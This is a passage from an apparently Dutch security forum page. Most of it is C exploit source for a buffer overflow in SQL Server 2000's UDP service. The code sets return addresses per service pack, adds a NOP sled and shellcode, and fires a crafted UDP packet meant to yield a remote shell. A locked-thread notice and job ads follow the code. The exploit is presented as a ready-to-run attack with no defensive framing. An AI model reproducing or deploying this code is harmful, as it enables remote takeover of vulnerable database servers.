// SQL 2000 no service packs needs the address here
strcat(request,"x01x70xAEx42");
// SQL 2000 Service Pack 2 needs the address here
strcat(request,"x01x70xAEx42");
// just a few nops
strcat(request,"x90x90x90x90x90x90x90x90");
// tack on exploit code to the end of our request and fire it off
strcat(request,buffer);
GainControlOfSQL();
return 0;
}
int StartWinsock()
{
int err=0;
WORD wVersionRequested;
WSADATA wsaData;
wVersionRequested = MAKEWORD(2,1);
err = WSAStartup( wVersionRequested, &wsaData );
if (err != 0)
{
printf("error WSAStartup 1.rn");
return 0;
}
if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 1 )
{
printf("error WSAStartup 2.rn");
WSACleanup( );
return 0;
}
if (isalpha(host[0]))
{
he = gethostbyname(host);
if (he == NULL)
{
printf("Can't get the ip of %s!rn", host);
WSACleanup( );
exit(-1);
}
s_sa.sin_addr.s_addr=INADDR_ANY;
s_sa.sin_family=AF_INET;
memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
}
else
{
s_sa.sin_family=AF_INET;
s_sa.sin_addr.s_addr = inet_addr(host);
}
return 1;
}
int GainControlOfSQL(void)
{
char resp[600]="";
int snd=0,rcv=0,count=0, var=0;
unsigned int ttlbytes=0;
unsigned int to=2000;
struct sockaddr_in cli_addr;
SOCKET cli_sock;
cli_sock=socket(AF_INET,SOCK_DGRAM,0);
if (cli_sock==INVALID_SOCKET)
{
return printf("sock erronrn");
}
cli_addr.sin_family=AF_INET;
cli_addr.sin_addr.s_addr=INADDR_ANY;
cli_addr.sin_port=htons((unsigned short)53);
setsockopt(cli_sock,SOL_SOCKET,SO_RCVTIM
EO,(char *)&to,sizeof(unsigned int));
if(bind(cli_sock,(LPSOCKADDR)& cli_addr,sizeof(cli_addr))==SOCKET_ERROR
)
{
return printf("bind error");
}
s_sa.sin_port=htons((unsigned short)SQLUDPPort);
if (connect(cli_sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR)
{
return printf("Connect error");
}
else
{
snd=send(cli_sock, request , strlen (request) , 0);
printf("Packet sent!rn");
printf("If you don't have a shell it didn't work.rn");
rcv = recv(cli_sock,resp,596,0);
if(rcv > 1)
{
while(count < rcv)
{
if(resp[count]==0x00)
resp[count]=0x20;
count++;
}
printf("%s",resp);
}
}
closesocket(cli_sock);
return 0;
}
Reageren
Deze posting is gelocked. Reageren is niet meer mogelijk.
Junior DevOps Engineer
Certified Secure is op zoek naar een Junior DevOps Engineer. Deze functie is een stuk interessanter dan de term doet vermoeden! Om jou als potentiële nieuwe collega meteen te laten zien wat we doen hebben we speciaal voor jou een selectie gemaakt van een aantal leuke security challenges. Are you ready for a challenge?
Cybersecurity Trainer / Streamer
Toe aan een nieuwe nieuwe job waarmee je het verschil maakt? In de Certified Secure trainingen laat je deelnemers zien hoe actuele kwetsbaarheden structureel verholpen worden. Ook werk je actief mee aan de ontwikkeling van onze gamified security challenges. Bij het maken van challenges kom je telkens nieuwe technieken tegen, van Flutter tot GraphQL, van Elastic Search tot Kubernetes.
